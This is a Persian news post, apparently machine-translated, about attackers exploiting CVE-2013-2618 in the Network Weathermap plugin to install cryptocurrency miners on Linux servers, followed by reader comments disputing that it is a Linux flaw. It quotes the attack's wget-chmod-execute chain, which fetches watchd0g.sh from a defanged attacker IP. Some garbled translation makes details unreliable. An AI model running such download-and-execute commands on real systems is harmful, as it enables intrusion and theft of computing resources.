یک نقص 5 ساله در لینوکس به مهاجمین امکان استخراج ارزهای رمزپایه را می دهد

سقوط لینوکس

این از استخراج کننده ارز رمزنگاری شده با استفاده از رایانه های از راه دور بدون مجوز صاحبان اینها در حال تبدیل شدن به یک روند است. من قبلاً در چند مورد در اینجا در وبلاگ در مورد این نوع شرایط صحبت کرده ام.

و این است که این امر از همان لحظه کنترل ارزهای رمزپایه کاملاً از کنترل خارج شده است جایگاه و ارزش بسیار قابل توجهی را به خود اختصاص داده اند، افرادی که دانش کافی برای دسترسی به رایانه هایی دارند که امنیت آنها را نقض می کند ، وقت خود را صرف جستجوی اطلاعات مهم یا حساب های بانکی کرده اند تا سود مالی دریافت کنند.

آنها به جای انجام این کار ، ساده ترین کار را انتخاب می کنند: کنترل این تیم ها را در دست بگیرند و آنها را در یک شبکه استخراج متحد متحد کنند و همچنین برای کارهای دیگری که معمولاً با یک بات نت انجام می دهند.

به این ترتیب معمولاً تعداد شما بیشتر می شود ، آنها فقط بر روی پول فوری تولید شده تمرکز دارند.

با درک هوشمندانه از روند بازار و دانش مناسب از تجارت رمزنگاری ، می توان فواید زیادی کسب کرد.

آیا لینوکس واقعاً یک سیستم ایمن است؟

بسیاری از ما این تصور را داریم که لینوکس یک سیستم عامل تقریباً کامل ایمن است ، واقعیت این است که هنوز هم دارای برخی اشکالات است.

خوب استبرخی از روزها TrendMicro یافته است، که در آن فاش شد جدید نقص در سیستم های لینوکس که مزیت استخراج ارزهای رمزپایه را به هکرها می دهد با استفاده از سرورها و ماشین آلات Linux.

در بیانیه ای از طریق وبلاگ خود آنها در مورد زیر نظر دادند:

از طریق نظارت ما درمورد پاسخ به حادثه ، تلاش برای نفوذ مشاهده کردیم که شاخص های آنها توانستیم با یک کمپین استخراج ارز رمزنگاری شده قبلی که از بدافزار JenkinsMiner استفاده می کرد ارتباط برقرار کنیم.

تفاوت: این کمپین سرورهای لینوکس را هدف قرار داده است. همچنین یک مورد کلاسیک از آسیب پذیری های استفاده مجدد است ، زیرا از نقص امنیتی منسوخ شده ای استفاده می کند که تقریباً پنج سال است پچ موجود است.

در این نسخه از طریق تجزیه و تحلیل خود موفق به شناسایی سایت های آسیب دیده شد برای این شکست که این بیماری عمدتا ژاپن ، تایوان ، چین ، ایالات متحده آمریکا و هند را تحت تأثیر قرار می دهد.

تجزیه و تحلیل حمله

از طریق تجزیه و تحلیل توسط Trend Micro Smart Protection Network جزئیات کمی در مورد نحوه استفاده مهاجمان از این نقص:

اپراتورهای این کمپین از CVE-2013-2618 ، یک آسیب پذیری قدیمی در افزونه Camapi Network Weathermap ، که مدیران سیستم برای تجسم فعالیت شبکه استفاده می کنند ، بهره برداری می کردند.

در مورد اینکه چرا آنها از یک نقص امنیتی قدیمی سو استفاده می کنند: Network Weathermap تاکنون فقط دو آسیب پذیری گزارش شده به صورت عمومی دارد ، هر دو از ژوئن 2014.

این مهاجمان ممکن است نه تنها از نقص امنیتی که برای آن سو explo استفاده وجود دارد ، بلکه از تاخیر وصله ای که در سازمان ها با استفاده از ابزار منبع باز رخ می دهد نیز استفاده کنند.

اصولاً این حمله از طریق حمله XSS انجام می شود:

نقشه هوا-رمزنگاری -4

قسمت فازی هدف حمله است ، یک وب سرور با پورت.

فایل /plugins/weathermap/configs/conn.php پرونده ای است که از حمله مداوم XSS به آن ناشی می شود / plugins / weathermap / php .

Además د conn.php در ابتدا ، می بینیم که یک درخواست HTTP مشابه برای صفحه ای به نام " خنک. php ".

برنامه استخراج ارز رمزنگاری شده از طریق این آسیب پذیری توزیع می شود از نقشه آب و هوای PHP در اهدافی که سرورهای لینوکس هستند

در تصویر می توانید نحوه ایجاد حمله را مشاهده کنید و شرح آن به شرح زیر است:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

کاری که می کند این است که نشانه را برای بارگیری یک پرونده با wget ارسال می کند ، این یک برنامه کاربردی است که تقریباً همه توزیع های لینوکس به طور پیش فرض نصب کرده اند

chmod 775 watchd0g.sh

پرونده را قابل اجرا می کند

./watchd0g.sh

کاری که در نهایت انجام می شود این است که فایل را در سرور اجرا کند.

خوشبختانه در حال حاضر یک پچ وجود دارد ( CVE-2013-2618 ) موجود برای شکست و می توانید آن را بارگیری کنید از این لینک

Si شما می خواهید در مورد آن بیشتر بدانید از این شکست شما می توانید از این لینک بازدید کنید.

Fuente: Cryptocurrency Miner از طریق آسیب پذیری نقشه هواشناسی PHP توزیع می شود ، سرورهای Linux را هدف قرار می دهد


محتوای مقاله به اصول ما پیوست اخلاق تحریریه. برای گزارش یک خطا کلیک کنید اینجا.

5 نظر ، نظر خود را بگذارید

نظر خود را بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخشهای موردنیاز علامتگذاری شدهاند با *

*

*

  1. مسئول داده ها: میگل آنخل گاتون
  2. هدف از داده ها: کنترل هرزنامه ، مدیریت نظرات.
  3. مشروعیت: رضایت شما
  4. ارتباط داده ها: داده ها به اشخاص ثالث منتقل نمی شوند مگر با تعهد قانونی.
  5. ذخیره سازی داده ها: پایگاه داده به میزبانی شبکه های Occentus (EU)
  6. حقوق: در هر زمان می توانید اطلاعات خود را محدود ، بازیابی و حذف کنید.

  1.   میگل مایول آی تور dijo

    احمق بودن ایمن نیست و علی رغم آن لینوکس شما را نجات می دهد.
    به روز نکردن وصله های امنیتی تقصیر لینوکس نیست. این تقصیر است که برخی از شرکت ها ، برای پس انداز پول ، احمق ها را به عنوان مدیر سیستم استخدام می کنند ،
    اما حتی در این صورت ، بلافاصله کشف می شود و بلافاصله حل می شود ، حتی هر حادثه امنیتی جزئی مانند این منتشر می شود.

  2.   من یک ویلا می خواهم مانند الدکولتاس dijo

    و لینوکس چه خطایی دارد که به روزرسانی های آن اعمال نمی شود؟ توسعه دهندگان گنو / لینوکس کار خود را با توسعه راه حل هایی برای آسیب پذیری های در حال ظهور و در دسترس قرار دادن آنها برای کاربران انجام می دهند. اگر پزشک یک واکسن آنفولانزا تجویز کند و آن را دریافت نکنید ، بیمار و سفت می شوید ... آیا این تقصیر پزشک است؟

  3.   لایحه dijo

    از آنجا که لینوکس آن چیزی که بود نیست ، دو خبر پشت سر هم با دو اشکال عمده:
    1.- در تدوین ویرایشگرهای بهتر ، آنها نرم افزاری را آزاد نمی گذارند و موارد دیگری را نیز فراموش می كنند (در نظرات ذکر شده است).
    2.- اخبار فوق العاده در مورد ویروس ها وقتی فقط روی سرورهای غیر به روزرسانی تأثیر بگذارند. اما اگر لینوکسی به طور پیش فرض برای چندین دهه به روز شده است. برای اینکه ترس را ایجاد کنیم ، انگار به آنتی ویروس مکنده به سبک ویندوز نیاز است. به نظر می رسد آنها سعی دارند بگویند لینوکس همان ویندوز است و نیست.
    اگر یک اشکال قدیمی است و قبلاً آن را وصله کرده اید ، نه خبری است و نه چیزی. در شرکت های مایکروسافت و آنتی ویروس مانند Trend Micro ، Norton ، Panda یا McAffee بازی نکنید و حقوق دریافت نکنید.
    به هر حال ، ما چندین سال در شرکت از Trend Micro استفاده می کردیم و این یک سیب زمینی واقعی بود ، یک گله بود ، زیرا سیستم آن می گفت که یک اجرایی دارای "ردپای" ویروس است (چیزی که می تواند ویروس باشد ، حتی اگر باشد نه) و چرا آن را حذف کرد (آن را به یک دایرکتوری برد تا اجرا نشود) که اجازه استفاده از آن را نمی داد ، و هیچ لیست سفید برای رفع انسداد این رفتار با یک فایل اجرایی ایمن که ما باید از آن استفاده کنیم وجود نداشت. برو گه این نسخه شرکتی بود ، نسخه مجزا این لیست سفید را داشت. تأسفبار - رقت انگیز.

  4.   لایحه dijo

    خود را خیلی ظریف توصیف نکنید.
    این مقاله در مورد یک حفره امنیتی است که به شما امکان می دهد وارد برنامه ای شوید ، آن را قابل اجرا کنید و آن را اجرا کنید. این حفره امنیتی است که هر ویروس برای انتشار نیاز دارد ، بدیهی است که برای ویروسی باشد که برنامه در کد آن نیاز داشته باشد. امکان اسکن کامپیوترها در شبکه برای تکرار عملیات و کپی کردن خودکار. آنها این کار را دقیقاً انجام نمی دهند زیرا در لینوکس حفره های امنیتی کشف شده توسط یک وصله امنیتی پوشانده می شود و منظور من این است که تفاوت بین ویندوز و لینوکس وجود ندارد ، زیرا وجود آنتی ویروس برای پوشاندن سوراخ ضروری نیست. به دلایل مختلف در ویندوز دشوارتر است: 1-- پرونده ها می توانند به دلیل افزونه ، اجرایی شوند و یک مرحله برای معرفی آنها در رایانه آسیب دیده حذف نمی شود. 2.- کاربران به طور مداوم برنامه هایی با منشأ مشکوک نصب می کنند زیرا اختصاصی هستند و باید آنها را بدون پرداخت پول داشته باشند (من نمی گویم خرید یک MS Office ، Photoshop ، ... برای اقتصاد خانگی بیش از دو برابر کردن هزینه تجهیزات کامپیوتر). 3.- دیر یا زود ویندوز شسته می شود ، کاربر آن را به همسایه ، دوست ، ... می برد که برای از دست ندادن زمان همه چیز را فرمت می کند و ویندوز نهایی را با پچ فعال سازی که به روز نشده است یا خود پچ نصب می کند یک برنامه جاسوسی قرار می دهد. ممکن است اینگونه نباشد و عالی باشد ، اما ممکن است اینگونه باشد و شما یک ویندوز برای رمزهای عبور خود جاسوسی کنید. در مقاله آنها سیستم معرفی را در لینوکس تحت تأثیر این آسیب پذیری ذکر کرده اند ، و برنامه ای را که به طور خودکار شبکه را اسکن می کند و از آن برای کپی و اجرای بر روی سرور استفاده می کند آسانترین قسمت همه چیز است ، به همین دلیل در این مقاله بیشترین گام مهم برای هر ویروس: دانستن آسیب پذیری سیستم در برابر حمله.

  5.   همبلیو dijo

    اطلاعات بد این یک اشکال در لینوکس نیست ، یک اشکال در یک برنامه PHP است ، یعنی چند پلتفرم است. این حتی منحصر به سیستم هایی نیست که هسته لینوکس را اجرا می کنند! اما حتی اگر این برنامه چند پلتفرمی نبود ، یک اشکال لینوکس نبود ، بلکه صرفاً یک برنامه بود.

    هسته لینوکس کوچکترین تداخلی در محافظت در برابر حملات برنامه نویسی بین سایت مانند این مورد ندارد. حداقل قبل از ارسال پنج دقیقه تحقیق کنید زیرا حقیقت این است که برای هر کسی که کمی درباره چیزی اطلاعات دارد ، شما بد به نظر می رسید.